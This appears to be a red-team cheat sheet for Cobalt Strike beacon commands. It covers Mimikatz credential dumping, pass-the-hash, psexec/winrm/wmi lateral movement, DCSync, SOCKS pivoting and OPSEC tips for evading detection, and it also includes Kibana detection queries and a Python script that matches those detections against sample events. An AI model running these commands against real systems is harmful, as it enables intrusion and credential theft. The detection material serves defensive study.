Here is a list of common commands supported by a Cobalt Strike beacon. Also see S1ckB0y1337/Cobalt-Strike-CheatSheet for some notes.
Beacon Management
C2
connect [host] [port]
: let CS connect to another TCP beacon
link [host] [pipe]
: let CS connect to another SMB beacon
sleep N
: change the sleep interval to N seconds
- OPSEC warning: increasing the check-in frequency may produce more noise on the network and reduce stealth.
checkin
: manually issue a check-in to the beacon
- DNS beacons require a manual check-in upon connection because they do not automatically send metadata (due to DNS bandwidth limits).
Job control
jobs
: list jobs
jobkill N
: kill job N
Session Passing
spawn [x86|x64] [listener]
: create a process and inject shellcode for a given listener
- foreign listener (MSF protocol):
  - In msfconsole: start a handler and set the payload to windows/meterpreter/reverse_http
  - In CS: create a “Foreign HTTP” listener with host and port matching those of the MSF handler. Once the payload is run (e.g. in a spawn command), msfconsole will receive a new Meterpreter session.
  - Note: x64 & stageless payloads are not supported
- Alternatively, a Meterpreter session can be created by first generating a raw stageless shellcode Meterpreter payload using msfvenom, then using shspawn [x86|x64] [file-to-payload] to run it.
Code Execution
Running code
run
: run a command
execute-assembly
: beacon will run a C# executable provided by the attacker by injecting it in memory (no files saved)
powershell-import /path/to/module.ps1
: import a PowerShell module (provided by the attacker)
powershell Cmdlet [Args...]
: run a PowerShell command on the beaconed host; piping supported
powerpick Cmdlet [Args...]
: run PowerShell commands without spawning a powershell.exe process; also supports AMSI bypass (post-ex option), unlike powershell
Information Gathering
Basic
getuid
: get UID of beacon’s process
Screenshotting
screenshot / printscreen
: take a screenshot (the second one uses PrintScr)
screenwatch
: take periodic screenshots of the desktop
Keylogger
keylogger
: start a keylogger job (also see View > Keystrokes)
Clipboard
clipboard
: get clipboard content
Files:
mv A B
: move/rename files
cd DIR
: change current directory
upload PATH
: upload a local file to the beaconed machine
Reconnaissance
net logons
: view logged on users on machine
Mimikatz / credential theft
logonpasswords / mimikatz !sekurlsa::logonpasswords
: dump cached NTLM hashes / passwords (elevated)
mimikatz !sekurlsa::ekeys
: dump Kerberos encryption keys for logged-on users, which are more relevant than NTLM hashes since it is the former that gets used over the network most of the time. Look for aes256-hmac.
mimikatz !lsadump::sam
: dump the NTLM hashes in the SAM database (local users only). If sysadmins reuse administrator passwords, SAM dumps can lead to lateral movement.
- OPSEC warning: this opens a handle to the SAM registry hive (Kibana: “Suspicious SAM Hive Handle”).
mimikatz !lsadump::cache
: extract domain cached credentials, which can only be cracked offline (since the format isn’t NTLM) and cannot be used for attacks like pass-the-hash.
- OPSEC warning: this opens a handle to the SECURITY registry hive (Kibana: “Suspicious SECURITY Hive Handle”).
NOTE: the aforementioned Kibana saved searches are found in the RTO lab.
Lateral Movement
pth DOMAIN\USER NTLM_HASH
: pass-the-hash (uses Mimikatz underneath)
- Use ls \\BEACON_HOST_FQDN\c$ to test for admin access after impersonation
make_token domain\user plaintext_pw
: create a token for a user given the plaintext password (uses the LogonUserA API); the token can only be used over the network
- The logon type passed to LogonUserA is LOGON32_LOGON_NEW_CREDENTIALS, which uses the caller’s token for the local machine and only uses the provided credentials over the network. This means that make_token only works for authenticating against remote services. Use spawnas for the local machine.
- Looks the same as runas /netonly in logs (hard to distinguish between regular and malicious traffic)
remote-exec [psexec|winrm|wmi] [target] [command args...]
: execute a command on a remote host; use remote-exec without arguments to list supported modules (e.g. psexec, winrm, wmi)
- see jump for psexec and winrm
- wmi: WMI provides a “process call create” API to execute commands on the target. remote-exec abuses it by having it execute the uploaded payload binary.
  - To identify: event.category: process and event.type: start and process.parent.name: WmiPrvSE.exe
jump [psexec|winrm|...] [target] [listener]
: run a payload on a remote target; run jump without arguments to list supported modules (e.g. psexec, winrm, …)
- winrm & winrm64
  - OPSEC note: use of SMB payloads is recommended since SMB traffic occurs frequently in AD environments.
  - One way to identify this lateral movement (that produces a lot of false positives): event.category: process and event.type: start and process.name: wsmprovhost.exe
  - To identify this lateral movement: event.category: process and powershell.file.script_block_text: "$var_runme.Invoke([IntPtr]::Zero)"
- psexec & psexec64: uploads a service binary that in turn executes the provided payload binary
  - Use of SMB payloads is also recommended, as before.
  - To identify this lateral movement: event.code: 4697 and winlog.event_data.ServiceFileName: \\\\*\\ADMIN$\\*.exe
- psexec_psh: uses a PowerShell one-liner instead of uploading a binary; always 32-bit
  - command pattern: %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand ...
- Running a second BOF as a different user (e.g. in case the call to CoInitializeSecurity triggered by running the first BOF was under a low-privileged user):
beacon> execute-assembly C:\Tools\SharpWMI\SharpWMI\bin\Release\SharpWMI.exe action=exec computername=web.dev.cyberbotic.io command="C:\Windows\smb_x64.exe"
rev2self
: revert ticket to original (delete pass-the-hash ticket)
DCSync
See: DCSync
The dcsync command lets us obtain username and credential data (e.g. NTLM hash) from a DC. This requires GetNCChanges, which is usually only available to domain admins.
This can be useful for crafting a golden ticket (by specifying krbtgt as the user) or for moving laterally to other domain admins.
A ticket is required for this command (e.g. make_token DEV\jking Qwerty123).
The beacon command is a wrapper around mimikatz lsadump::dcsync, which uses the MS-DRSR protocol.
OPSEC warning
Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events where the identifying GUID is 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set).
Find these using the “Suspicious Directory Replication” saved search in Kibana.
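As an added example that is not part of the original notes, the following Python applies the Kibana detections quoted in the lateral movement section and in the DCSync OPSEC warning above to constructed ECS-style event records, so the rules can be sanity-checked offline; the field name assumed to carry the 4662 Properties value (winlog.event_data.Properties) is an assumption, as are all sample values.

```python
# Added example, not code from the original page: applies the Kibana-style
# detections quoted above to ECS-shaped event dicts. The 4662 Properties field
# name (winlog.event_data.Properties) is assumed; all sample events are constructed.
import re

REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes(-All)
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
# The Kibana pattern \\\\*\\ADMIN$\\*.exe unescapes to \\*\ADMIN$\*.exe
ADMIN_SHARE_SERVICE = re.compile(r"\\\\[^\\]+\\ADMIN\$\\[^\\]+\.exe", re.IGNORECASE)

def _is_process_start(ev):
    return ev.get("event.category") == "process" and ev.get("event.type") == "start"

def classify(ev):
    """Return the name of the detection that ev matches, or None."""
    name = str(ev.get("process.name", "")).lower()
    parent = str(ev.get("process.parent.name", "")).lower()
    if _is_process_start(ev) and parent == "wmiprvse.exe":
        return "remote-exec wmi: child of WmiPrvSE.exe"
    if _is_process_start(ev) and name == "wsmprovhost.exe":
        return "jump winrm: wsmprovhost.exe start (noisy)"
    # A KQL phrase match on analysed text is approximated by a substring test
    if "$var_runme.Invoke([IntPtr]::Zero)" in str(ev.get("powershell.file.script_block_text", "")):
        return "jump winrm: script block"
    svc = str(ev.get("winlog.event_data.ServiceFileName", ""))
    if str(ev.get("event.code")) == "4697" and ADMIN_SHARE_SERVICE.fullmatch(svc):
        return "jump psexec: service installed from ADMIN$"
    props = str(ev.get("winlog.event_data.Properties", "")).lower()
    if str(ev.get("event.code")) == "4662" and any(g in props for g in REPLICATION_GUIDS):
        return "dcsync: directory replication (4662)"
    return None

def scan(events):
    """Return (index, detection) pairs for every event that matches a rule."""
    return [(i, d) for i, ev in enumerate(events) if (d := classify(ev))]

# Constructed sample events; the last one is benign and must not match
SAMPLE_EVENTS = [
    {"event.category": "process", "event.type": "start", "process.parent.name": "WmiPrvSE.exe"},
    {"event.category": "process", "event.type": "start", "process.name": "wsmprovhost.exe"},
    {"powershell.file.script_block_text": "$var_runme.Invoke([IntPtr]::Zero)"},
    {"event.code": "4697", "winlog.event_data.ServiceFileName": "\\\\srv.example.invalid\\ADMIN$\\ab12.exe"},
    {"event.code": "4662", "winlog.event_data.Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"event.category": "process", "event.type": "start", "process.name": "notepad.exe"},
]
```

Running scan(SAMPLE_EVENTS) flags the first five records and leaves the benign notepad.exe start alone, which is the behaviour to confirm before trusting the saved searches against real telemetry.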
Token Impersonation
See: token impersonation
Pivoting
SOCKS
SOCKS4a proxy:
beacon> socks [port]
OPSEC warning
A SOCKS4a proxy may be used by any user or device that has access to the team server. Use SOCKS5 for best security (i.e. authentication).
SOCKS5 proxy (supports authentication & additional logging):
beacon> socks [port] socks5 disableNoAuth [username] [password] enableLogging
- Either view the team server output or use journalctl to view the SOCKS5 auth logs.
To use the proxy in proxychains, first edit the config:
Then to make a program use the proxy:
Port Forwarding
Reverse port forwarding: forwards a source port (on the beaconed host) to a destination interface and port (on the team server)
OPSEC warning
A Windows Defender Firewall alert will appear in the graphical shell. If the user clicks Cancel, an explicit block rule will be created. To prevent it, create a rule to allow the traffic before running the rportfwd beacon command:
Remove the firewall rule later by its display name: